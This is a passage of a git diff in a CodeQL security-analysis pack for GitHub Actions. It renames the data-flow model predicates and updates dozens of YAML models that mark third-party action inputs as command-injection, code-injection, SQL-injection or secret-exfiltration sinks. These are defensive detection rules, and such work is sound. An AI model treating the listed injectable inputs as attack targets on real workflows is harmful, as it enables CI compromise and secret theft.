...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 +- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- .../ext/renovatebot_github-action.model.yml | 2 +- .../ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 2 +- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- .../ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.gbo | 13 --- ql/lib/qlpack.yml | 15 ++-- ql/lib/yaml.dbscheme | 80 ------------------- ql/lib/yaml.dbscheme.stats | 4 - ql/src/codeql-pack.lock.yml | 6 ++ ql/src/qlpack.yml | 7 +- ql/test/codeql-pack.lock.yml | 6 ++ ql/test/library-tests/test.ql | 4 +- ql/test/qlpack.yml | 6 +- 755 files changed, 819 insertions(+), 898 deletions(-) create mode 100644 .!79690!.DS_Store delete mode 100644 ql/lib/qlpack.gbo delete mode 100644 ql/lib/yaml.dbscheme delete mode 100644 ql/lib/yaml.dbscheme.stats diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26dc..c060ce974300 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 0.1.16 codeql/dataflow: - version: 0.1.8 + version: 0.2.7 + codeql/javascript-all: + version: 0.9.1 + codeql/mad: + version: 0.2.16 + codeql/regex: + version: 0.2.16 codeql/ssa: - version: 0.2.8 + version: 0.2.16 + codeql/tutorial: + version: 0.2.16 codeql/typetracking: - version: 0.2.8 + version: 0.2.16 codeql/util: - version: 0.2.8 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.1.5 + version: 0.2.16 compiled: false diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c46a3ee64a1f..d0b84f918d59 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -55,8 +55,8 @@ predicate externallyTriggerableEventsDataModel(string event) { * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate sourceModel(string action, string version, string output, string kind, string provenance) { - Extensions::sourceModel(action, version, output, kind, provenance) +predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { + Extensions::actionsSourceModel(action, version, output, kind, provenance) } /** @@ -69,10 +69,10 @@ predicate sourceModel(string action, string version, string output, string kind, * - kind: Either 'Taint' or 'Value' * - provenance: verification of the model */ -predicate summaryModel( +predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ) { - Extensions::summaryModel(action, version, input, output, kind, provenance) + Extensions::actionsSummaryModel(action, version, input, output, kind, provenance) } /** @@ -84,13 +84,13 @@ predicate summaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate sinkModel(string action, string version, string input, string kind, string provenance) { - Extensions::sinkModel(action, version, input, kind, provenance) +predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { + Extensions::actionsSinkModel(action, version, input, kind, provenance) } predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, kind, _) and + actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -113,7 +113,7 @@ predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { exists(Uses uses, string action, string version, string input, string output | - summaryModel(action, version, input, output, "taint", _) and + actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( @@ -135,7 +135,7 @@ predicate externallyDefinedStoreStep( predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | - sinkModel(action, version, input, kind, _) and + actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 6c64b72e6b4c..05f71cfc0be6 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,21 +5,21 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel( +extensible predicate actionsSourceModel( string action, string version, string output, string kind, string provenance ); /** * Holds if a summary model exists for the given parameters. */ -extensible predicate summaryModel( +extensible predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ); /** * Holds if a sink model exists for the given parameters. */ -extensible predicate sinkModel( +extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index 67455900ec36..b897e8f2c5a4 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml index 0220f0d54d84..3a5b34880b95 100644 --- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 9b36680af8f0..20abd5328727 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index fe3c3e58b5f9..dcc20433483f 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 41b67c2a625d..3afd9991e073 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 4d12a2936969..3deae2a9f197 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index 7cb2e10e9267..7dd0459ab7f9 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 83f09bc6bde5..721042aafaf0 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index bdd8a8f77c9b..ee4dbaf2b55e 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 7e5f5c9ee6a4..76ae920d2550 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 8daa9a9c2b33..46f667d75a01 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 80502e487b83..4df6fe61a43f 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 2a26d31feac7..aab329160ea1 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 82e81f558166..610d188f0655 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index 58554eb3f612..b571bded8ca8 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index ca99210b4c2a..cd8f4f73e498 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 1563d95b0b14..6ebc3875e07b 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2bb6000355d6..2b2dbd014b7f 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index b0c3419abe93..78b7eb1394c2 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index cbe593690e44..0f146da2e0cb 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index f29355d48827..483a3bf51727 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 8463ed9577b4..e06e75f7a3bf 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index f20a877c3d28..d0a88ff31673 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index e0fe96ff9152..a29f84a55b5e 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index a7489b686882..0e11fe45b42c 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index c0a18c36465f..7e0970034a52 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 79ed7a80437c..2f62f211da9c 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 550b5b854ed7..f94ad242321d 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index bbe886112595..5872399881c5 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 83b3bc3520df..02c5dcd3ccaa 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 3b0642fece44..45bf0c57355a 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index db55d3c6f3a8..4ac3492c41c3 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a4539923b35f..a48da0cedfcc 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 462268636874..6ca7aa86c06d 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index afe3e82ca1f6..11f1f10980fe 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 5b0a9dab38d7..9ed2cb7908b8 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 35bbd72f0a4d..7f279f37a45d 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 472778d33b4b..68f434f4797a 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 1647e5607304..890a47c79fca 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index bbdad8287dd3..aff5c3303165 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml 